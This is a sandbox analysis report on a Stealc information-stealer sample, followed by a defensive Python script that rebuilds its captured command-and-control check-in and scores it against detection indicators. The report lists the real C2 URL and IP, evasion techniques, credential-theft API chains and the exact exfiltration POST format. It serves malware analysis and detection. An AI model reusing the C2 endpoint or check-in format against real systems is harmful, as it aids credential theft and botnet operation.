Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560648
MD5: e26b7b214a9bcdada5b6a91ced4f99b3
SHA1: 092b5406ba5d33ebd2f40fb8ccbd9e191fb3a845
SHA256: 0fcf04a856f1a43c977d633e19138fe8736482425557a16ea02e7572d2d6d313
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E26B7B214A9BCDADA5B6A91CED4F99B3)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Yara matches:
  Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security
  Source: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
  Source: 00000002.00000002.1375818515.000000000179D000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
  Source: 00000002.00000003.1278149370.00000000055A0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
  Source: Process Memory Space: file.exe PID: 7044 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
  Source: Process Memory Space: file.exe PID: 7044 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

No Sigma rule has matched

Suricata alerts:
  Timestamp: 2024-11-22T04:27:16.663705+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source: 192.168.2.7:49700 | Destination: 185.215.113.206:80 | Protocol: TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.php/F | Avira URL Cloud: Label: malware
Source: file.exe.7044.2.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: http://185.215.113.206/c4becf79229cb002.php/F | Virustotal: Detection: 18%
Source: file.exe | ReversingLabs: Detection: 44%
Source: file.exe | Virustotal: Detection: 54%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C74C50 | API chain: lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C760D0 | API chain: lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C940B0 | API chain: CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C86960 | API chain: lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C7EA30 | API chain: lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C79B80 | API chain: CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C86B79 | API chain: lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C79B20 | API chain: CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C77750 | API chain: GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C818A0 | API chain: lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C83910 | API chain: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C81250 | API chain: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C81269 | API chain: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C8E210 | API chain: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C8CBE0 | API chain: wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C7DB80 | API chain: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C82390 | API chain: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C7DB99 | API chain: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C823A9 | API chain: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C84B10 | API chain: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C84B29 | API chain: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C8DD30 | API chain: GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C8D530 | API chain: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C716A0 | API chain: lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C716B9 | API chain: lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49700 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 43 43 39 38 37 30 36 37 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 2d 2d 0d 0a
    Data Ascii:
    ------HDAAAAFIIJDBGDGCGDAK
    Content-Disposition: form-data; name="hwid"

    7CCC9870677F2148772887
    ------HDAAAAFIIJDBGDGCGDAK
    Content-Disposition: form-data; name="build"

    mars
    ------HDAAAAFIIJDBGDGCGDAK--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (8 occurrences)
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C76C40 | API chain: lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/M
Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/F
Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php0
Source: file.exe, 00000002.00000002.1375818515.00000000017C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?
Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpD
Source: file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpl
Source: file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.2062?
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C79770 | API chain: memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop
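The check-in captured above is a multipart/form-data POST to a bare IP with no User-Agent header, whose body carries nothing but an hwid and a build field (here the botnet name "mars" from the extracted configuration). The script below is an added example, not part of the Joe Sandbox report and not the logic of the ET rule that fired: it re-assembles the request byte for byte from the headers and Data Ascii body shown in the report, parses the multipart body, and scores four indicators chosen for this example (POST to a .php path, missing User-Agent, Host that is a raw IP, form fields exactly {hwid, build}); those indicators are an assumption about what is distinctive, not a vendor signature. The benign upload request is constructed for contrast.

```python
import re

# The check-in as captured in the report above: request line, headers and
# the 211-byte multipart body, re-assembled byte for byte.
STEALC_CHECKIN = (
    b"POST /c4becf79229cb002.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------HDAAAAFIIJDBGDGCGDAK\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"7CCC9870677F2148772887\r\n"
    b"------HDAAAAFIIJDBGDGCGDAK\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"mars\r\n"
    b"------HDAAAAFIIJDBGDGCGDAK--\r\n"
)

# Constructed for contrast (not from the report): an ordinary browser upload.
_BENIGN_BODY = (
    b"--abc123\r\n"
    b'Content-Disposition: form-data; name="file"; filename="notes.txt"\r\n'
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"hello\r\n"
    b"--abc123--\r\n"
)
BENIGN_UPLOAD = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: files.example.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: multipart/form-data; boundary=abc123\r\n"
    + b"Content-Length: %d\r\n\r\n" % len(_BENIGN_BODY)
    + _BENIGN_BODY
)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, path, _version = request_line.decode("ascii").split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser: returns {field name: value}."""
    delimiter = b"--" + boundary.encode("ascii")
    fields = {}
    for part in body.split(delimiter):
        if part.startswith(b"\r\n"):
            part = part[2:]
        if part.endswith(b"\r\n"):
            part = part[:-2]
        if not part or part == b"--":        # preamble / closing delimiter
            continue
        part_headers, _, value = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', part_headers)
        if match:
            fields[match.group(1).decode("latin-1")] = value.decode("latin-1")
    return fields


def assess_checkin(raw: bytes) -> dict:
    """Score a request against four indicators (an assumption of this example)."""
    method, path, headers, body = parse_request(raw)
    boundary = re.search(r"boundary=([^;]+)", headers.get("content-type", ""))
    fields = parse_multipart(body, boundary.group(1).strip()) if boundary else {}
    indicators = {
        "post_to_php": method == "POST" and path.lower().endswith(".php"),
        "no_user_agent": "user-agent" not in headers,
        "host_is_bare_ip": re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", headers.get("host", "")) is not None,
        "hwid_build_only": set(fields) == {"hwid", "build"},
    }
    return {
        "method": method,
        "path": path,
        "fields": fields,
        "content_length_ok": int(headers.get("content-length", "0")) == len(body),
        "indicators": indicators,
        "suspicious": all(indicators.values()),
    }


if __name__ == "__main__":
    for label, req in (("stealc", STEALC_CHECKIN), ("benign", BENIGN_UPLOAD)):
        print(label, assess_checkin(req))
```

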